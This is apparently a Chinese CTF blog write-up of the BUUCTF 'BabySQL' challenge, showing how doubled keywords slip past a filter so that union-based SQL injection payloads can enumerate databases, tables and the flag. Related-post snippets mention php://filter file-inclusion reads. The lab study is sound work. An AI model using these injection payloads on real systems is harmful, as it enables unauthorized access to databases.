[极客大挑战 2019]BabySQL

最新推荐文章于 2025-10-06 18:47:12 发布
原创 最新推荐文章于 2025-10-06 18:47:12 发布 · 139 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF #网络安全 #WriteUp #web安全 #web

文章讲述了在2019年的一个极客大挑战活动中,作者如何利用双写绕过过滤,进行SQL查询,从发现数据库ctf,到找出表名,最后成功找到含有flag信息的列的过程,展示了SQL注入技术的应用。

[极客大挑战 2019]BabySQL

进入靶场:
在这里插入图片描述

  • 页面还是一样,估计是加强了过滤。

  • 还是用union查询先试一下:' union select 1,2,3#
    在这里插入图片描述

  • 发现unionselect似乎都被过滤了。

  • 尝试用双写绕过:' ununionion selselectect 1,2,3#
    在这里插入图片描述

  • 成功绕过了,得到回显的位置,那么就好办了。

  • 查询所有数据库名:' ununionion selselectect 1,2,GROUP_CONCAT(schema_name) FROFROMM INFOORRMATION_SCHEMA.SCHEMATA #
    在这里插入图片描述

  • 发现一个数据库ctf

  • 接着就查这个数据库查表名

  • 经过多次测试,可以发现过滤了:FROM OR WHERE,均用双写绕过即可

  • 最终payload为:' ununionion selselectect 1,2,GROUP_CONCAT(table_name) FRFROMOM INFOORRMATION_SCHEMA.TABLES WHWHEREERE TABLE_SCHEMA='ctf'#
    在这里插入图片描述

  • 发现一个表,表名为Flag

  • 直接盲猜有个列名为flag,得到payload:' ununionion selselectect 1,2,flag FRFROMOM ctf.Flag#
    在这里插入图片描述

GET Flag ! ! !

也可以先查询列名…无所谓的

BUUCTF [极客挑战 2019]Secret File
m0_49025459的博客
04-27 2956
题目 查看网页源代码 <!DOCTYPE html> <html> <style type="text/css" > #master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { cursor: default; } </style>
极客挑战 2019BabySQL(手动sql注入)
4pri1
02-06 1068
[极客挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧 [极客挑战 2019]BabySQL(手动sql注入) [极客挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧 试一下万能密码 本来打算直接抓包的,看到一位师傅,直接给双写绕过了,试了试果然有用(还把+给过滤了1=1–+用不了了) 接下来和原来的操作基本一样,继续手动注入【别忘了双写绕过!】 按照2019lovesql那个的完全一样,再试一遍 用order by或者union .
web | CTF极客挑战 2019 Secret File
weixin_46301214的博客
05-27 1557
解题要点 【解题思路】 目录扫描+检查源码 ->发现了一个隐藏目录 根据文字提示,觉察到有隐藏暗跳 找到暗链后访问就能看到解题源码 直接利用文件访问漏洞读取php文件源码即可 【难点】 通过题目语言暗示觉察出暗中跳转 【漏洞点】 源码泄露 文件包含漏洞 步骤一:发现隐藏目录 查看源码发现了隐藏的目录文件 ctrl+点击,跳转速达 步骤二:发现隐藏文件跳转网址 SECRET可以点击,那我们就点一下看看吧...
[极客挑战 2019]Secret File
最新发布
rasssel的博客
10-06 181
应该是php页面隐藏了,用php协议读一下源码,看看哪里有get传参。发现他应该要跳到action.php,但现在却跳到了end.php。果然是302重定向,我们来看看 secr3t.php。进入这个页面发现是这样,这个secret可以点击。看看secr3t.php 页面源码。一进去是这样的,看一下页面源码。去flag.php看看。在改页面用php协议。
BUUCTF Web [极客挑战 2019]Secret File
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客挑战 2019]Secret File一、题目简介二、思路分析1)信息泄露2)文件包含三、解题步骤1)查看网页源代码2)拦截请求,查看响应信息3)文件包含漏洞4)PHP伪协议读取文件内容四、总结 一、题目简介 进入链接以后是一个「文字」页面,没有什么特别的功能 二、思路.
极客挑战2019babysql
03-28
### 极客挑战 2019 BabySQL 比赛题目与解题思路 #### 背景介绍 极客挑战 2019BabySQL 是一道经典的 SQL 注入题目,主要考察选手对于 SQL 注入漏洞的理解以及如何利用 `UNION` 查询绕过简单的过滤机制。该...
BUUCTF [web专项15][极客挑战 2019]BabySQL
yanglinchiji的博客
11-03 258
试一遍之后会发现or可能被过滤掉了,因为只有当or的形式变成非连接符的时候才可以通过。其实这题找出来万能钥匙成功登录后就没有想法了,看了一下别人的思路再做就ok了。进入后获得账号密码,用此账号密码进行登录,并在进行的同时进行注入操作。爆库,发现show databases不行,用麻烦点的。发现下面有个flag字段,选择爆数据。测试列数(密码需要自行修改)发现共有三列,开始测回显点。感觉在ctf中,再爆一下表。进入后发现是个登陆界面。查看表Flag下的字段。
[buuctf]/[极客挑战 2019]BabySQL 1
y14ffhgcg56_的博客
11-07 1871
这里出现报错,说不存在geek.Flag。根据上面我们知道存在geek这个库,和Flag这个表。但Flag这个表在ctf库下,并不在geek库下。所以可以将Flag改成ctf.Flag,表示查询数据库ctf下Flag表。下一步,进步确认闭合方式,正常步骤应该输入username=1' and 1=1 --q &password=1。(被过滤的词:and,or,by,union,select,from,where都可以用双写绕过)然后进行列数判断,又出现类似报错。接下来就是逐步的爆库,爆表,爆字段,爆内容。
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5527
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
buuctf-[极客挑战 2019]Secret File(小宇特详解)
小宇的web博客
01-15 919
buuctf-[极客挑战 2019]Secret File(小宇特详解) 这里用鼠标找一下,找到了oh!you found me或者用f12来找到点击即可 点击后 这里再次点击SECRET 这里啥也没有找到,尝试抓包,在上个SECRET这里抓包,放到重发器中重新发送 找到了secr3t.php 点开这个目录 发现这个没有过滤file 直接使用php伪协议 secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
[极客挑战 2019]Secret File 1解题思路
m0_74047686的博客
03-04 2850
在做这道题的时候,主要是会使用burpsute工具,并且还要了解PHP伪协议的一些知识及概念,最后还用到了一些密码里的base64,这些都需要了解一下。
[极客挑战 2019]Secret File1 详解
2402_88178163的博客
03-19 1817
得出最后的 flag = 'flag{9795d8ed-2e7f-49cc-abca-c15202fc1fb0}' (这里的题目过关方法和解密方法可能还有很多种 但目前博主的能力只能到这里)我们读一下代码可以发现这里存在一个file的传参值 并且有一个if判断 这里if判断的strstr 这个strstr是执行。我们这时用ctrl+u或者F12看下代码可以发现有一个隐藏目录Archive.room这个我们点这里进入一下。本人为纯技术小白 写下此篇以记录和巩固知识笔记。
BUUCTF-[极客挑战 2019]Secret File1
Monica的博客
09-10 932
目录 题目: 分析: 源码: 知识点: 分析: 方法1: 方法2: 题目: 分析: 打开环境就是一个全黑界面加几行字,没有其他发现,日常查看源代码:发现链接 点击链接,跳转到一个有secret点击的页面,点击发现: 什么也没有。按道理不应该啊,他说在回去看看 我们返回到secret页面,查看源代码: 发现了action.php,但是仔细一看,查阅结束页面显示的是end.php,猜测可能是跳转了。 我们用bp抓包看看,...
【BUUCTF系列】[极客挑战 2019]Secret File 1
2402_84408069的博客
08-08 1476
技术文章摘要本文分析了一个文件包含漏洞的利用过程。通过F12开发者工具和Burp抓包发现隐藏的secr3t.php文件,其源码存在文件包含功能但过滤了../、tp等关键词。研究采用php://filter伪协议绕过防护,通过Base64编码读取flag.php内容。最终解码获取flag,完整演示了从信息收集到漏洞利用的全流程。文末特别强调技术研究的合法边界,要求所有测试必须获得授权,并遵守最小影响原则和数据保护法规。
BUUCTF[极客挑战 2019]Secret File 1题解
2301_79896143的博客
06-02 1090
题目"Secret File 1"考察文件包含漏洞,通过分析网页源码发现隐藏入口Archive_room.php,利用BurpSuite拦截重定向后访问secr3t.php。该页面存在文件包含漏洞,但过滤了常用payload构造方式。最终使用php://filter协议绕过过滤,成功读取flag.php的base64编码内容,解码后获得flag。解题过程涉及源码分析、抓包工具使用和文件包含漏洞利用技巧。
BUUCTF之[极客挑战 2019]Secret File--------文件包含和密码文件
weixin_44632787的博客
06-13 1151
  BUUCTF之[极客挑战 2019]Secret File--------文件包含和密码文件 启动我们的项目,看到挑战的页面 右键查看网页的源代码   看到一个可疑的链接,我们访问它:./Archive_room.php。然后出现以下新的页面,我们根据提示访问它看看会出现什么…   啊啊啊???什么?就没别的提示了吗?   不急,我们看看源代码。好吧源代码什么也没有。但是根据上一个页面的提示:**没看清楚?回去再仔细看看吧。**这句话很可疑,是不是提示我们说那里有个重定向,导致页面跳转的太快所
[极客挑战 2019]Secret File(BUUCTF)
HackerYY的博客
12-30 1263
BUUCTF找秘密水题 内附解题过程
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值